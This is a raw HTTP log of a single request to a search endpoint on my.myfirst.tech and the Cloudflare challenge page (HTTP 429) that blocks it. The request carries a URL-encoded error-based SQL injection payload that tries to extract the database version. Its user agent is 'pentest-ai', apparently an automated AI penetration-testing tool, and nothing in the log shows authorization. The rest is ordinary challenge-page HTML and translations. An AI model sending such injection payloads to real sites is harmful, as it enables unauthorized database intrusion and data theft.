REQUEST:
GET https://my.myfirst.tech/search?options[prefix]=1%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%20COUNT%28%2A%29%2CCONCAT%28version%28%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9926
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8472e0c49a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=%2BXXOucHyrIuLmsYOcsxHk1jgH2qezQnQrw5hfklthp1Cw13pDy4HfW2Flu4IHB3wNsdsVmZRwDNX1rUAVxlS7t%2F4wNqoccC%2FEbXNEP%2FDh%2B9V%2BSjFK3lQJwBmK33VjVR30w%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8472e0c49a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'nFmYLNDtkWyzELEGDxld6bCTltKMMEUbIEP0.z3xElc-1784281151-1.2.1.1-XZGZpN6V4SPk_Q0qONNWCGSmK4_zqG0c3SJGgM6C7CMbxUJ3gg0Ivg2TalxluziK',cITimeS: '1784281151',cRay: 'a1c8472e0c49a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?options%5Bprefix%5D=1%27+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29%2CCONCAT%28version%28%29%2CFLOOR%28RAND%280%29*2%29%29x+FROM+information_schema.tables+GROUP+BY+x%29a%29--\u0026__cf_chl_tk=YcTCJf8YwHbNi.01zXkKcEK2Un6Riwpu2hWg_5b_GQQ-1784281151-1.0.1.1-_idYReS9mRZXLBxjVc0nIHPT15V8K4P0MRHNTxkrAAU",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?options%5Bprefix%5D=1%27+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29%2CCONCAT%28version%28%29%2CFLOOR%28RAND%280%29*2%29%29x+FROM+information_schema.tables+GROUP+BY+x%29a%29--\u0026__cf_chl_f_tk=YcTCJf8YwHbNi.01zXkKcEK2Un6Riwpu2hWg_5b_GQQ-1784281151-1.0.1.1-_idYReS9mRZXLBxjVc0nIHPT15V8K4P0MRHNTxkrAAU",md: 'gUJv6hUJ.w7NHRIbXywbgkMR1iCYYIu0H9PqR7OT2OM-1784281151-1.2.1.1-I4dnjAo9yDqOc4scErJdsDkniKLM33Rf4jG409cLWJTd.zTQjvBElNLAZ7mZ1g1JMF.4pHallya0uPow7ggGcOzA4oncwFoiFYhj0GxBWkrTRAecjj3dnZRAVIHVRJxhNj4XwQkXwwrj4GRunZij_BvneEkzm.7L6SDsIDIEHxqF._jknjdowGN5Y5QIe.uMn8zD8DhyrAH4_iSARJ6nb5Lj_BrJWuOXIFHs.I6rxx9QnNFJqPUDmJqy99NWSMHoMywZVMTEVSTZd0l7BJbazODkpAzp6LZbKN9ojw54xyQ6Tj7fRbcL_wK9z.GVvYOetD9ztuo640yzC4zP5X8QIi5Ib8qhfwUK9vtDZGTWRSZ7Qn7jPEvuOxgJnvB6w2TISs4wdFaMHU3HkrxyYWxIwsMfQTDmq5P6ljlQXmX69kTkSfPT039ZTR4x1nbAlew0UWXUnbYGQ9GLeh4LzT3E.duyuBGjOwIG5WDLgNyyGH8zbArX.L3wOJBzfNB69vXR9MbClPKMnpTHCd792AmRsRZiIsG_xR0FtVS7LsWJEfmJX7mO0dr8CUxrTDY4LG9_YPCDMAopymeY4DQLUN3WNZFdwIqyLKGRRMQvVVK.6OxDlYSgDrZCTd7ZshZBitOv3O9TyAlE4gZFKgxYwOF6xz1B7PBatjdSanOuGmI8hiaRBUX1zWEJwoNtI3qxiQ5HMhjCtIUbX8Cg.3No.Og9d0ZwYwM9bpto0bCXRoiT24GoPsrcq2HW21Rp0GWx_klavDDCmYSK_PwwmXfM5k.XXh.5z5wK2Nk3Y9JUaRGa2sadtDv.WU9YfB1jTgegcrsFsDhYC7Ux3SJOX91KGmhtNGsoJfv4irIsLn24QmFLGXFLfS6BCbG8km_nW3M7DGJC.Kybwcej7aHV9KPirbcq.7Kavv3UmaorSnIV7Y_uVUYtncqTPXlhyT9fjATVMsKJdJg5pI8HgUcbqImCY2QBAzfLZKgcVmJ6J.xdrYiRKMWSR.np4aEsJK2wviZ5ppd3G7rUZDnA2_52zbRf2F7W95fMsbo3lRevxU6.fHlH6qLdizcIJKzl24lQNanmWsDF0xBbUK0FQ0Y11dVv5IDTQgW47kT2xL0UrDUI8KbLHf0yhZQJzgvunsHB0N87Q6IylixGYzZN06GtURde8c0JFirqtw_gAHeq7cXRskKBxAYPiFUEkndzBZVwFnxXUEaMM2uCYy14ZW4SdGWfvqktzddTxuf8CEBwQVGknTGG.VMA19DSTZwwb8NukCCkLImX2K4Tn6zPdYCqeVhezHZmM0FbmsM8_aLrZd6FSgsS00uB9TR3M4QyPWi6LLHFXkiqdXMzOF9CW3AiMUnuVIYj5A',mdrd: '4Tmk3HEVJf3RLYbV3U8lUZw.4AT5wZAqJCyPIVpiWWA-1784281151-1.2.1.1-MTwxhPRZtHmY7trWYYwy3PJBijap1wt04diZGi_EhqgheILetZxk9hP3zzTxvyLGPusUSJNY2TxhukbKOnLW58RgilI36wl1sHKPGY16P3UIct4pjEVFw7OlW32VXzcCpRWhf1SAlCmCfOLIhqR63eCO_zcd6v_8o3Aro1q4TrJiv8iYKsoXYRMXLG4B5ErOAtWur70c1fwNMMvWyGTCU1HAYggPc3QDe_flhE5QcVyQ9wpSmSK_hHLxnqIpMZAr',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8472e0c49a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?options%5Bprefix%5D=1%27+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29%2CCONCAT%28version%28%29%2CFLOOR%28RAND%280%29*2%29%29x+FROM+information_schema.tables+GROUP+BY+x%29a%29--\u0026__cf_chl_rt_tk=YcTCJf8YwHbNi.01zXkKcEK2Un6Riwpu2hWg_5b_GQQ-1784281151-1.0.1.1-_idYReS9mRZXLBxjVc0nIHPT15V8K4P0MRHNTxkrAAU"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
